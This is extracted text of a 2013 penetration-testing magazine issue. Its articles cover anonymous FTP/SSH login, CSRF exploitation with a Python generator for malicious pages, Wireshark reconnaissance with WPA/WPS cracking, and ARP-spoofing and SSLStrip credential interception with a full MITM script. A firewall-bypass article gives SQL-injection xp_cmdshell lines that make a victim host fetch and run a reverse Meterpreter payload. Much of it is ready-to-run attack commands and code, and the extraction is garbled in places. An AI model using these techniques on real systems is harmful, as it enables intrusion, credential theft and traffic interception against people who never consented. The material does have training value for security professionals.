Exploiting Anonymous LoginA pentester should look for anonymous ftp or anon-ymous ssh login possibilities in the target serv-ers. Nmap and metasploit has NSE (Nmap Script-ing Engine) scripts and auxiliaries respectively for searching and exploiting such vulnerabilities.

Logging in to Anonymous FTP is presented in Listing 5. Exploiting FTP/SSH Server: Post logging in to the FTP/SSH Server one could PUT/WGET a local privilege escalation exploit and execute it to get the server shell.

Exploiting SMtP Open relayA pentester should evaluate if the SMTP mail server is vulnerable to mail relaying. A vulnerable SMTP open relay server doesnt verify if the user is


authorized to send e-mail from the specified e-mail address. Therefore, an attacker could spoof or im-personate any e-mail address for sending e-mails.

The following nmap NSE script can be used to find open relay mail servers:

nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=,smtp-open-relay.ip=,...] -p 25,465,587

The following metasploit auxiliary can be used to scan open relay mail servers:

msf > use auxiliary/scanner/smtp/smtp_relaymsf auxiliary(smtp_relay) > show actions ...actions... msf auxiliary(smtp_relay) > set ACTION msf auxiliary(smtp_relay) > show options ...show and set options... msf auxiliary(smtp_relay) > run

Social Engineering Social Engineering attacks like phishing, baiting, impersonating, tab-nabbing, click-jacking, and so on, can be employed for human exploitation.

SummaryPenetration testing of an organization puts var-ious controls of its security architecture to test. It is not just checking the existence of required controls but that the controls are appropriate and sufficient to mitigate the overall risk. In order to evaluate a layered defence, a multi pronged at-tack approach is required to find an entry point. A typical pentesting attack comprises of three phas-es reconnaissance, vulnerability detection, and exploitation. The reconnaissance phase focuses on information gathering about the target environ-ment, the vulnerability detection phase is meant for exploring vulnerable ports and services on discovered hosts and the idea of the exploitation phase is to exploit the detected vulnerabilities. A well equipped security fortress can also be pen-etrated by a small hole. It just requires hard work, knowledge, and experience.

SuMIt AGArWALMS Information Security and Cyber Law, CISSP, CISA, STQC-CISP, ISMS LA, C|HFI, E|CSA, C|EH is Team Lead at a renowned Cyber Incident Response Team (CIRT). He has undertaken many Cyber Forensics Investigations, Vulnerability Assessment, and Penetration Testing as-signments during his experience of seven years in this domain. He can be reached at [email protected].

Listing 5. Logging in to Anonymous FTP

ftp 172.26.1.5

Connected to 172.26.1.5220 Welcome to my FTP service.Name (172.26.1.5:root): anonymous331 Please specify the password.Password:

230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls

Logging in to Anonymous SSH:

ssh 172.26.1.10 -l [email protected] password:

Last login: Fri Sep 13 23:24:27 2013 from 192.168.5.7

-bash-3.2$ ls

references http://nmap.org http://www.offensive-security.com

Quality

Integrity

Sense of SecurityCompliance, Protection

and

[email protected]

Now Hiring

Sense of Security is an Australian based information security and risk management consulting practice. From our offices in Sydney and Melbourne we deliver industry leading services and research to our clients locally, nationally and internationally.

Since our inception in 2002, our company has performed tremendously well. We thrive on team work, service excellence and leadership through research and innovation. We are seeking talented people to join our team. If you are an experienced security consultant with a thorough understanding of Networking, Operation Systems and Application Security, please apply with a resume to [email protected] and quote reference PTM-TS-12.

Teamwork

Innovation

Passion


X SS exploits a vulnerability on a target server to access, manipulate, and exploit data on the client-side. Really, CSRF does just the opposite. CSRF uses an unsuspecting client sys-tems browser to manipulate data and/or perform unauthorized transactions on the server-side (al-though this data is often unique to the users ac-count, profile, session, and so on). In this essay, I am going to discuss what a CSRF attack is, the distinction between GET-method and POST-meth-od CSRF vulnerabilities, and how to streamline the exploitation process for more effective testing.

What is Cross-Site request Forgery?Cross-Site Request Forgery is commonly referred to as a confused deputy attack. This terminolo-gy paints an accurate picture of what is going on in the background. Consider a scenario in which a malicious person, who does not have access to a certain building, desires to gain access to that building to accomplish a particular task. Guard-ing the building, there is a deputy who has autho-rization to get inside. One approach could be to charge the building with guns blazing, but this will most likely not end well for anyone. A more effec-tive strategy would be for the malicious person to devise a scheme in which he tricks the deputy into performing the desired task on his behalf. This is

exactly what happens in a CSRF attack. The web-browser of the client system acts as the confused deputy. There are several steps involved in a suc-cessful CSRF attack:

The client web-browser must be trusted and authorized to access and manipulate certain content within the web-application (in the same way that the deputy was a trusted agent at the building). This is usually accomplished by some sort of authentication mechanism, such as a user login portal.

The parameters of the transaction will be sup-plied by an unauthorized third party (in the same way that the deputys idea to perform that mali-cious task was inspired by the intruder). This can be accomplished in various different ways to in-clude iframe injection or social engineering.

The transaction will be completed without ques-tion because of the session ID and cookies sup-plied by the client browser (in the same way that the deputy could complete the task without question because of his position of authority).

Lab Environment for CSrF AttacksIn this essay, I am going to address CSRF at-tacks using both GET and POST HTTP methods. Both of the applications that I am going to use to

Automating POSt-Method CSrF AttacksOf the various implementation flaws that are commonly found on web-applications, CSRF (Cross-Site Request Forgery) is one of the lesser-known, and as such, more frequently overlooked vulnerabilities. Unlike common server-side vulnerabilities (SQL injection, directory traversal, file-inclusion, etc), CSRF attacks do not directly attack the server. It is often compared to XSS (Cross-Site Scripting), but reallythis isnt accurate either.

Article comes from Pen Test WEBAPP.



demonstrate these attacks are publically available for download and use. The first web-application that I will be using is DVWA, which is available at http://www.dvwa.co.uk/. The second web-application is Mutillidae, which is available at http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10. Each of these is a deliberately vulnerable web-application that can be hosted within your own lab environment and can be used for penetration testing training and research. However, to save yourself the frustration of having to setup and configure each of these web-applications independently, I recommend that you just download Metasploitable2. Metasploitable2 is a Linux server that is also intentionally vulnerable. Both of the dis-cussed web-applications are already configured on the server upon install, and can be accessed via the HTTP service hosted on TCP port 80. Metasploit-able2 can be downloaded at http://sourceforge.net/projects/metasploitable/files/Metasploitable2/.

GEt Method CSrF AttackThe easiest CSRF vulnerabilities to exploit are those that involve modifying parameters that can be sup-plied to a server via a GET request. This is an ex-

tremely critical vulnerability because it can be exploit-ed without the use of any special tools or scripting. I will use DVWA to demonstrate such a scenario. After logging in to the application with the administrator ac-count, select the DVWA Security option and set the security level to low. Then select the CSRF option on the left side of the page. You will notice that a web-application is displayed that can be used to update the password for the admin user account. See Figure 1 for an image of the web-application.

For the purpose of this exercise, I have decided to update the password to password and have en-tered it into both fields. Prior to submitting a request, I configured Burp Suite to function as an intercepting proxy to capture the request that would be sent to the server to update the password. Figure 2 shows the GET method request that was submitted.

Notice that both of the parameters (password_new and password_conf) are actually passed as arguments in the relative URL that is displayed in the GET request. As you might imagine, this vulner-ability can be exploited by simply crafting a link with hardcoded parameters and then enticing an authen-ticated user to browse to that link. Lets suppose that a malicious intruder wants to trick the administrator into updating his password to a new password that the intruder has chosen (in this case, we will use badguypass). He could simply create the following hyperlink: http://192.168.223.132/dvwa/vulnerabili-ties/csrf/?password_new=badguypass&password_conf=badguypass&Change=Change. Once the link is created, the intruder could use some well-crafted social engineering techniques to persuade the vic-tim to click on the link. As soon as the victim brows-es to the site, the parameters are supplied in con-junction with the users session ID and cookies. The victims password is then automatically updated without his consent.Figure 1. DVWA application to update admin password

Figure 2. GET request to update admin password in DVWA


Although we do live in a world where most web-developers are not extremely security conscious, they at least understand enough about the ap-plications functionality to realize that this sort of approach to performing a secure transaction is a huge mistake. Because of this, you will not com-monly see this sort of CSRF vulnerability in the wild. It is much more likely that you will run into CSRF vulnerabilities that are associated with the use of the HTTP POST method.

POSt Method CSrF AttackMutillidae provides a good example of a POST method CSRF vulnerable web-application. To get started, open up Mutillidae in the web-browser and then browse through the menu OWASP Top 10 > Cross Site Request Forgery > Register User. Us-ing this first application, you should create a user account that can be used to simulate the CSRF victim. Once you have completed the form, select the Create Account button. Then browse through the menu once again OWASP Top 10 > Cross Site Request Forgery > Add to your blog. A blog-ging web-application will be displayed. Take note of the fact that we have not yet logged in with an account and that the blog is currently set to anony-mous. This will change after we log in with the user account we previously created. However, prior to logging in, you will need to use a local intercepting proxy to capture the POST request that is supplied when submitting a blog entry. We will then use this template to build our CSRF attack. Figure 3 shows the POST request form that is submitted when I submit a blog entry of TEST.

Notice that, unlike the GET request that was used by DVWA, the parameters here are not supplied to the server within the relative path or the URL. Instead the parameters are supplied as POST

method data that can be seen at the bottom of the request. This makes a successful attack more dif-ficult, since you cant simply provide a modified link to an unsuspecting victim. Instead, we need to fig-ure out a way to have the victim submit a POST request to the vulnerable server with all necessary POST data included. One way to accomplish this task is to host a malicious webpage that will use embedded script(s) to supply the data.

The example that I am going to provide was done in BackTrack 5 R3. First, I started the Apache HTTP service on my BackTrack system by browsing through the main menu Applications > Backtrack > Services > HTTPD > apache start. The default webroot directory in this distribution of BackTrack is located in /var/www/. So this is the location where we will need to create our malicious site. To do this, change the current directory and then use your pre-ferred text editor to generate the file.

cd /var/www/nano evil.html

An example of an HTML file with embedded Ja-vaScript that could be used to perform the CSRF attack against this Mutillidae application can be seen in Listing 1.

In the case that an unsuspecting user browses to this HTML code, the JavaScript will execute on their system. It will redirect them to the loca-tion specified in the action field and will supply the POST parameters specified by the following input fields. Their browser will submit any cookies and session-ids established with the vulnerable server in order to complete the CSRF transaction.

To test this attack, browse to the top of the Mu-tillidae application and select Login/Register to log into the victim account that you had previously

Figure 3. POST request for blog entry submission in Mutillidae


registered. Now look at the blog associated with this user. Because this is the first time logging in with this account and because the blog is user-specific, there should be no posts at this time. Now suppose that some malicious third party sent a link to the web-page that is now hosted on the BackTrack sys-tem. You can simulate this by browsing to the ma-licious web-page at http://127.0.0.1/evil.html. Upon doing this, you will be redirected back to the blog

page and should notice that a new blog entry has been created without your consent, and the con-tents of this blog entry contains the same text that was supplied by the blog_entry POST parameter in the JavaScript. In this way, an unauthorized trans-action was completed without the consent of the us-er, by browsing to the malicious web-content (see Figure 4). Consider the potential implications of this type of vulnerability, given the types of transactions

Listing 1. HTML and JavaScript to exploit Mutillidae POST method CSRF vulnerability

document.csrf.submit();

Figure 4. Execution of unauthorized transaction in Mutillidae via CSRF attack


that are often completed by POST parametersprofile changes, online purchases, banking transac-tions, and so on.

Automating POSt Method CSrFIn testing for CSRF vulnerabilities, I have discov-ered that this template can be effective to exploit

Listing 2. CSRF Generator Python Script to automate POST method CSRF exploitation testing

#!/usr/bin/python

print \n********** CSRF HTML/JAVASCRIPT GENERATOR - H@ck1tHu7ch **********\n\nprint USE: This script is intended to generate malicious HTML code with an imbedded javascript, \

nthat can be used to perform POST-based CSRF (Cross-site Request Forgery) attacks. \nPrior to using this script, ensure that the apache HTTP service is running \nand that the webroot for this service is located at /var/www. \n\n\n*****************************************\n\n

url = raw_input(Enter the URL of the CSRF vulnerable target:\n)params = raw_input(\nEnter the number of POST paramters to be supplied:\n)html = raw_input(\nEnter the filename to be generated (example - evil.html):\n)filepath = /var/www/ + html

dict = {}i=0while (i < int(params)): i = i+1 print \n\n*** PARAMETER # + str(i) + ***\n name = raw_input(Enter the NAME of parameter + str(i) + :\n) val = raw_input(Enter the VALUE of paramter + str(i) + :\n) dict[str(name)] = str(val);

file = open(filepath, a)file.write(\n)file.write(\n)file.write(\t\n)file.write(\n)file.write(\n)file.write(\t\n)for x in dict: file.write(\t\t\n)file.write(\t\n)file.write(\t\n)file.write(\t\tdocument.csrf.submit();\n)file.write(\t\n)file.write(\n)file.write(\n)file.close()

print \n*** The script has written the HTML code to the file + filepath + \nand should be accessible via the web-browser at \nhttp:\\\\127.0.0.1\\ + html + ***\n

print \nTo complete CSRF attack, entice the victim (who has already established \na trusted ses-sion on his/her browser) through social engineering or \niframe injection, to browse to the malicious site\n\n

OPEN 08/2013

most POST method vulnerabilities. To save the time of having to develop unique HTML/JavaScript code for each instance of a POST method CSRF vulnerability, I have developed a Python script that will actually write the HTML code itself and will au-tomatically place it in the /var/www/ directory. This script can be seen in Listing 2.

There are two major functional parts of this script. The first part of the script gathers user supplied input regarding the vulnerable URL, the number of POST parameters, and the name of the output HTML file. Each of these supplied values is then assigned to a variable within the python script. I have also used a while loop to loop through the number of POST parameters. For each parameter, user input is requested to include both the name and value. These are then placed into a dictionary called dict. The second functional part of the script is the part that actually generates the HTML out-put. Much of this is hardcoded. However, the previ-ously supplied user input from the first part is also used to help generate the file. The previously sup-plied URL is supplied by calling on the url variable. And a for loop is used to write each of the POST parameters from the dictionary into the HTML con-tent. Upon running this script, you can then test the CSRF exploit in the same way that we had done in the previous example.

ABOut tHE AutHOrJustin Hutchens (OSCP, CISSP, CNDA, CEH, ECSA, CHFI) previously worked for the United States Air Force as a network vulnerability analyst. Dur-ing that time, he supported a large en-terprise network with over 55,000 net-worked systems and performed a wide

range of tasks to include vulnerability assessments, in-trusion detection, and incident response. He currently works as a security consultant and performs security as-sessments and penetration tests for both corporate and government clients. He was also the writer and develop-er of Kali Linux Backtrack Evolved: Assuring Security by Penetration Testing, a video training series that cov-ers the entire penetration testing process using the Ka-li-Linux operating system. This course is currently avail-able from Packt Publishing (www.packtpub.com). Justin is available for contact at www.linkedin.com/in/justin-hutchens.


Basic Black Hat recon with WiresharkPicture the situation: You wake up in a locked room, no windows, no signs of where you are, the door is locked and all you have is your trusty laptop and cat 5 network lead coming out of the wall. What do you do? OK, it is a little far-fetched but you get the point. On unknown networks and black hat testing, Wireshark is a must-have tool to find critical information about your surroundings, infrastructure and potential vulnerabilities.

For the purposes of this tutorial I am run-ning Kali 64 bit KDE, although other options (Backtrack 5 etc.) are available, I find this operating system and tool set the best for my day to day cyber-security life.

Im Listening...First thing is first, I want to confirm that the network connection is live, and find out as much informa-tion as to what other equipment is on the network. Now, all network settings should never be set to auto-connect, thus I can start Wireshark listening on eth0 (my primary network card) and connect the network lead without sending any outbound data on the unknown network.

Wireshark is an open source packet capture ap-plication, capable of listening and recording both transmitted and received data from Ethernet cards, fibre cards, USB and virtual devices. The default view within the GUI interface, starting at the top down is Packet List: This shows real-time and his-torical packets sent and received on the interface, Packet Details: An easy to read the breakdown of a selected packet of data with source, destination and contents, and finally Packet Bytes: The raw packet in its byte format.

Once we have connected up the lead, traffic starts flooding in at regular intervals. Cisco and Ju-

niper switches are notoriously chatty in their de-fault configuration. It is usually possible to deter-mine the type of kit in use on a network just by listening to port responses and network broad-casts. With switch heart beats and appliance dis-covery traffic, our view of the network infrastruc-ture starts to expand.

Figure 1. The main wireshark interface

After sitting and waiting for a while we start to see more traffic on the LAN, which can provide us with details on IP structure and addressing in use. Wireshark can capture both network broad-cast traffic, and by the use of ARP poisoning (dis-cussed later) direct point to point traffic for use in

Article comes from Pen Test EXTRA.



man in the middle. However, with the majority of Windows networks, the workstations and servers are always advertising themselves in broadcast mode. The image below shows a Windows 7 work-station booting up and announcing its presence on the network. By reviewing the packets content in the bottom window we can determine the worksta-tions name is ITHC-PC and it is presently part of a domain called INFOSEC0. For the keen eyed, we can see the default IP address of a network card pre-DHCP request. The MAC Address is also vis-ible (we should make a note of this for later in case MAC filtering is in use on the network). Our newly discovered host has successfully picked up an IP address proving the use of DHCP on the network.

Figure 2. Netbios name packets and DHCP request capture

Patience is a Virtue..As further time progresses we can also detect oth-er workstations, domain controllers, domain name, user accounts and even broadcasts from a partic-ular vendor for antivirus updates. All the time we are collecting more and more reconnaissance and gathering a mental picture of our surroundings. In the majority of corporate networks I have scanned it is possible to determine the company name from the domain name. In some organisations the server naming conventions can indicate the target servers purpose.

Examples include , , , and even etc.. For this reason I always recommend naming conventions that obfuscate potential server types.

Now that we have ascertained host names, IP ad-dresses, default gateway and even user accounts, we can now monitor for a host to take the role of. By replicating the name, IP and MAC address of a workstation we can now turn from passive to ac-

tive and become a part of the network. Using a handy Virtual Machine that we can re-name and change the details of, we can replicate and Ghost a machines connection to the LAN and start run-ning our usual passive port scans, ARP poisoning to capture NTLMs, FTP and telnet credentials and associated user accounts including internet traffic.

Something in the air...If the Cat 5 lead was a dud, and we have no con-nection through wired means then it is time to flick on the Wireless switch and start listening to the traf-fic drifting through the air. Again this is easy through wireshark, as our interface listing earlier included wireless interfaces. In my case its wlan1 (an Alfa networks AWUS036H USB wireless dongle).

Previous tutorials have covered the method of capturing wireless access point details, devices connecting to wireless, hand-shakes in WEP, WPA and WPA2. There are two popular methods of lo-cating authentication details to access points in a black hat world. I stress that these must only be used on a network where you have permission to perform a hack attempt, or if you believe your life is in danger and you are locked in a windowless room with just your laptop for company...

traditional method WPA2Briefly the tools required are airmon-ng, airodump-ng to capture the wireless network names, encryp-tion method and associated access points to lis-ten to. Then use either airocrack-ng or hashcat to brute force crack the key.

# ifconfig wlan2 down (turn off the wifi card so we can change the MAC)

# macchanger -m 00:11:22:33:44:55 wlan2 (change the MAC address to 00:11:22:33:44:55 to maintain anonymity or change to a valid net-work MAC in the case of filtering)

# ifconfig wlan2 up (turn the card back on with new MAC address)

# airmon-ng start mon0 (this will start the card in monitor mode, it may complain over running services, if any errors occur after this point then please consider # kill for those offending)

# airodump-ng mon0 (this will start listen-ing for both Wireless access points and wire-less stations with Wi-Fi enabled and associat-ed access points. Control+C out of the search when you have located a suitable access point to attempt to attach to, also check there


are associated stations with that access point to intercept the hand-shake.)

Best to open a new terminal window so we flick between our access point and station list, and the upcoming commands.

# airodump-ng mon0 -c --bssid -w saveme.txt mon0

(now we limit our traffic capture to one access point and start writing to a file we will later attempt to crack).

Once again we sit and wait for traffic to accumu-late and for a WPA handshake message to con-firm we have the data we need to play with. Should you become impatient you can force a station to de-authenticate from the access point with the fol-lowing command:

# aireplay-ng -0 2 -a -c mon0

(this sends two de-authentication commands be-tween the access point and station forcing a re- authentication to occur)

The captured handshake cannot be brute forced using John, hashcat etc. I have a reason-ably powerful nVidea graphics card so I can use hashcat and my GPU for processing. Hashcat re-quires the capture file to be in its own hccap file format. The following will clean and create an .hc-cap file for us:

# wpaclean # aircrack-ng -J

To use a wordlist:

# /usr/share/oclshashcat-plus/cudaHashcat-plus64.bin -m 2500

(The -m 2500 is the format of the hash we are cracking 2500 is WPA, 1000 is NTLM)

To Brute force an 8 character password in lower-case, uppercase, numerical and special, use the following, but be prepared for a very long wait...

# /usr/share/oclshashcat-plus/cudaHashcat-plus64.bin -m 2500 -1 ?l?u?d?s ?1?1?1?1?1?1?1?1 ( -1 is our variable, ?l lowercase, ?u uppercase, ?d digits, ?s special characters)

WPS Method WPA/2The tools required for WPS cracking are airmon-ng, wash and reaver:

# ifconfig wlan2 down (turn off the wifi card so we can change the MAC)

# macchanger -m 00:11:22:33:44:55 wlan2 (change the MAC address to 00:11:22:33:44:55 to maintain anonymity or change to a valid net-work MAC in the case of filtering)

# ifconfig wlan2 up (turn the card back on with new MAC address)

# airmon-ng start mon0 (this will start the card in monitor mode, it may complain over running services, if any errors occur after this point then please consider # kill for those offending)

# wash -i mon0 --scan (This starts wash in ac-tive probe and scan mode. It will send packets to all access points visible and display those vulnerable to WPS testing with details on BS-SID, channel, ESSID and WPA version)

# reaver -i mon0 -b --v --fail-wait=360 (This starts a brute force WPS number check on the BSSID target, provid-ing verbose information so we can confirm it is working and waiting 360 seconds after a failure to connect. This is usually sufficient for rout-ers that have a failed authentication protection level before allowing a re-connect).

In my experience Reaver usually takes up to 8 hours to complete a scan and provide a WPS key for most wireless networks.

We are In!!!!Once we have successfully authenticated to the wireless network (again bear in mind the use of MAC address filtering) we can set wireshark in to monitor mode and capture traffic until our heart is content. On busy networks be aware capture files (.cap) can become Gigabytes in size over a rela-tively short amount of time.

Interception...Although most networks are very noisy and we can usually pick up a lot of information by just passive-ly listening, in our scenario we want to be more pro-active and learn a little more about our cap-tors and start intercepting traffic. If we can capture usernames, passwords, URLs and intercept traffic we can start to own our target network. This is a standard Man in The Middle (MiTM) type attack.


We are going to route all traffic through our laptop by poisoning the ARP Traffic.

This can be done by starting Wireshark first of all to capture all poisoned traffic. The first example is to only poison 1 host and attempt to capture all traffic between it and the gateway.

# arpspoof -t

Wireshark contains several pre-configured search and filter options for detecting certain types of traffic. As mentioned previously we have items such as NTLM authentication, network broad-casts from servers and appliances, FTP traffic, ARP commands, device heartbeats, ICMP etc.. We can search for specific terms and packets easily under the Filter menu.

WWW.yourtrafficIsMineAlthough full traffic capture between the host and the gateway is good, we will not be able to see any en-

crypted SSL traffic. For example if a user is using a popular web based email system we cannot see any of the username, passwords or content of https traf-fic. To solve this little issue we can use SSLStrip.

# echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A PREROUTING -p tcp

--destination-port 80 -j REDIRECT --to-port 10000# arpspoof -i wlan2 -t

(ARP spoof basically tells the network to direct all traffic between our victim and the gateway via our laptop. Allowing us to intercept and record traffic with Wireshark and other tools.

# sslstrip -p -w /root/sslstrip.txt

(This will direct all SSL post commands to our designated text file. This includes usernames and passwords to https login sites)

Figure 3. Capturing web traffic and SSL certificates as MiTM


noteAt the present time this does not always work for clients running Chrome/Chromium and Google logins because of the way it transmits https traffic.

If you want to capture all http traffic in a nice list format you can open another new terminal and run the application urlsnarf:

# urlsnarf -i wlan2 | grep http > /root/httplog.txt&

Our Wireshark session is still capturing all the traf-fic between the victim pc and gateway. It is also pos-sible to extract all images and web pages from the packet capture file .pcap after the fact. Although on Kali Linux you will need to first perform an.

Listing 1. The script for iptables

#!/bin/bashecho Howdy - this little script can poison all network traffic and route traffic this pc - including

HTTPS. Consider this your warning... Any Password captured will be displayed when you kill the program with the letter q. Ok on with the show....

read -p Press a key to continue :o)echo -n Do you want to execute Wireshark when done? If yes, Press Enter read -e NOYESecho -n Do you want to extract pictures from the pcap via tcpxtract? If yes, Press Enter read -e XTRACTecho -n What interface to use? i.e. wlan0: read -e IFACEecho -n Name of Session? (name of the folder that will be created with all the log files): read -e SESSIONecho -n Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: read -e GATEWAYecho -n Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: read -e VICTIMmkdir /root/$SESSION/iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chain#### BACKTRACK:python /pentest/web/sslstrip/sslstrip.py -p -w /root/$SESSION/$SESSION.log &echo Press S for a Traffic Status and Q to close nicely.sslstrip -p -w /root/$SESSION/$SESSION.log &iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$GATEWAY/

/$VICTIM/$XTRACTtcpxtract -f /root/$SESSION/$SESSION.pcap -o /root/$SESSION/$NOYESwireshark /root/$SESSION/$SESSION.pcap ## Clean up....killall sslstrip#####BACKTRACK: killall pythonkillall urlsnarfiptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainetterlog -p -i /root/$SESSION/$SESSION.eci


# apt-get install tcpxtract

When connected to the internet.Save the packet capture to a file on your laptop

in the default .pcap format and create a new sub-directory for all of the images and html web pages and video.

# mkdir /root/Capture# tcpxtract -f /root/packetcap.pcap -o /root/Capture/

If you struggle with the ARP Spoof application it is possible to use iptables. Although in my ex-perience on wireless this can struggle to ARP the whole network. Listing 1 consists of a handy script I found on the internet that has been modi-fied to suit our re-quirements.

Whos calling?With a pre-configured menu for locating both en-crypted and non-encrypted Voice Over IP traf-fic, the value of Wireshark soon becomes clear. Protocols default supported include SIP, H323, ISUP, MFCP and UNISTIM. The core reason for

capturing this traffic is the ability to replay dis-cussions and even video of captured conversa-tions. Using the built in features it is possible to ascertain the start and stop times of calls, details of call initiator, any authentication types in use, including security certificates, the protocols in use and call status. If the network you are moni-toring has heavy traffic and multiple calls going at once, it is possible to prepare a filter using the menu system and filter destination, source and protocol.

To replay voice conversations we need to ARP poison the network as above, then save our cap-ture file. So we will start with a brand new Wire-shark capture and filter out some of the network noise so we have a better file to work with:

From the main menu select Capture | Capture Filters....

On the Capture Filter Dialogue box select No Broadcast and No Multicast.

From the main menu select Capture.... Once we are happy that we have captured some traffic and possibly a conversation we can use the Telepho-ny menu and then VOIP Calls to select our traffic.

Figure 4. Replaying SIP Voice traffic with built-in tools


The built-in player allows us to listen to the convesa-tion (Figure 4).

Lets see those passwords...We have been sitting and watching our network traffic for some time now, capturing traffic to a lo-cal file will allow dissemination and analysis both on-line and off-line. The most commonly used fil-ter in Wireshark we can use is HTTP authenti-cation. Although most web sites are now using SSL which encrypts traffic between the host and browser. Some older mail services and poor-ly managed sites will still allow non-encrypted logins. Also, lets face it most people use the same password for nearly every website, be it secure or not.

The filter for these in Wireshark is http.authen-tic. Or in the example below, I just ran a string search for the word admin. By using the built-in filters (which self-populate with options when you start typing) we can see a list of all traffic used in authentication on insecure web pages. Review the items in the lower section of the console to see the content of a captured packet in both original HEX and translated English.

The item below shows a captured http authenti-cation packet to the network gateway a Netgear ADSL router. As we can see the username is admin, and the password is set to PasPassr5T (Figure 5).

It wasnt me!Most definitely worth a mention is how Wireshark is used in my day-to-day life as a penetration tes-ter. The forensics and recording value of wire-shark provides me with a full record of all of my security assurance testing during a scan. This can prove to be invaluable when tracking down any is-sues reported with kit that has been scanned (and even those that are not). Many times I have had servers or appliances crash during the scanning progress and with the help of Wireshark I can ei-ther prove which commands or process caused the issue, or more importantly I can prove I was nowhere near the troublesome box at the time of a potential incident....

LEE ALEXAnDEr kInGSophlee LtdLee is an Information Assurance and IT Security professional and has worked on several programmes for HMG, MoD and NATO. He has extensive experi-ence of:Pentesting and Vulnerability Assess-

ments, HMG Security Policies, JSP440, RMADS, CESG In-foSec Memoranda, ISO27001, Security Policies and Pro-cedures, Security Assurance, Accreditation Require-ments, Risk Assessments.Email:[email protected].

Figure 5. Web page password capture

PCI & PA DSS QSA PCI ASV Scanning

P2PE QSA & P2PE PAVA-PT

Risk Assessment Forensics

HIPAA & FISMA ComplianceHIPAA & FISMA ComplianceManaged Security Serrrrrr

Formal Rrrk Arrrrrmrnt

Complranrr Managrmrnt

Artion Managrmrnt

Data Drrrorrry

Dorumrnt Managrmrnt

PCI DSS ImplrmrntationPCI DSS Awarrnrrr

PA DSS ImplrmrntationFormal Rrrk ArrrrrmrntOCTAVE Implrmrntation

OWASPSrrurr CodrSrrurr Codr

consulting

training

Pioneers in Synergistic SecurityReduced Compliance Cost + Improved Security

automation


Bypassing new generation Firewalls with Meterpreter and SSH tunnelsDuring a recent penetration test I found a Windows host running a web application that let me execute code via an SQL injection error. The host was a Windows 2003 Server with an SQL Server 2005. It was part of a local area network (LAN), and my intention was to use it to pivot to other hosts on the LAN, up to create me an account of Domain Administrator and take possession of the entire Network.

At this point, my attack vector was very clear: Upload and run a meterpreter payload to get a remote session. Escalate privileges on the remote host. Capture the hash of the Administrator to use

it on other hosts. Use a Delegation Auth Token of a Domain

Admin user to impersonate it, and use it to cre-ate a Domain Administrator user.

Use the host as gateway to access other hosts and servers on LAN.

By testing the above attack vector, some prob-lems were detected that had to be solved to achieve the ultimate goal.

The main problem was that after getting up one re-verse payload of meterpreter in the host and run it, the reverse connection did not reach its destination.

My first thought was a firewall was blocking ac-cess to unusual ports, so I repeated the process this time using a payload trying to connect to port 80 of my machine, but neither worked.

The same test using netcat worked, so I fig-ured out that problem was related with the firewall blocking meterpreter packages probably for be-ing a Deep Inspection Firewall with the signa-tures of meterpreter in its signature file.

To solve the problem, I used encryption, since a firewall can just inspect the packets in clear, but not encrypted. To ensure packets were encrypted end-to-end (from compromised machine to my lo-cal machine), I used an SSH tunnel, successfully achieving my goal of bypass that security barrier.

In this article I will try to explain step by step all the processes involved to bypass the deep in-spection firewall and achieve a meterpreter ses-sion with the remote host. The reason for wanting a meterpreter session is the ease with which you can escalate privileges and pivot to other hosts from Metasploit Framework.

The process is summarized as follows:

Raise the necessary tools to the remote host. Establish ssh tunnel forwarding the needed

ports. Launch meterpreter payload through the tun-

nel. Receive meterpreter session on the other side

of the tunnel.

How to upload the payload?When we have access to a Linux system, usually have no problem to upload files to, because normal-ly any Linux distribution comes with wget or curl, so we just need a web server to publish the binaries

Article comes from Pen Test EXTRA.



and download them using any of these tools. But in Windows, things are different. By default we do not have any of these tools or similar ones. We could try to open Internet Explorer or Firefox if installed to download the file, but there is a danger that the program remains pending user interaction and not being on the screen would be a problem with that.

So what I did (sure there are more ways) was to use the command ftp from windows.

By default the ftp is an interactive program. When executed asks for a username and pass-word to log in. Once you logged in, the wanted or-ders or commands can be introduced, ending the session with a bye.

But the ftp for Windows provides the ability to use it in a non-interactively way, passing in a text file all the strings that need you to send to the FTP Server. This is achieved with -s file.txt.

These are the steps I used to upload the files:

First I leave a file called met.exe (reverse me-terpreter payload) in a public ftp.

Using the SQL injection I found, inject the fol-lowing system command:

;exec master..xp_cmdshell (echo ftp& echo kk@& echo bin& echo get met.exe& echo bye) >ftp.txt;exec master..xp_cmdshell ftp -s:ftp.txt IPServerFTP; --

This injection creates the file ftp.txt with the fol-lowing contents:

ftpkk@binget met.exebye

And then call the command ftp passing as pa-rameter the -s and the file we just created.

The result of this is the host will connect to the FTP server, authenticate an anonymous session, execute the command bin, execute get met.exe which will download the file in the system and end the FTP session with the bye command.

At this moment we have the payload on the re-mote host, and we only need to run it with another SQL injection, and put a Metasploit handler on the attacker host to get a meterpreter session.

This is the SQL injection we would use:

;exec master..xp_cmdshell start /B met.exe;--

The /B switch of the command start prevents opening a window of cmd while running the pro-gram. There could also be called simply met.exe, but this would have left the process running the query, and for another injection would have to open a new window, because if canceled or closed it, the meterpreter session died unless it h

Pentest Open 08 2013

Documents

Transcript of Pentest Open 08 2013